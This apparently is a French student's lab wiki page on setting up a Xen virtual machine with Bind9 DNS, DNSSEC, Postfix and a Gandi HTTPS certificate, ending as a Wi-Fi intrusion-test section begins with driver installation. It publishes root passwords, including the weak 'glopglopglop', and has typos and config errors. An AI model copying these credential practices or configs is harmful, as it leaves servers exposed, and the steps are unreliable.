|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers gandi a télechargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionn pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
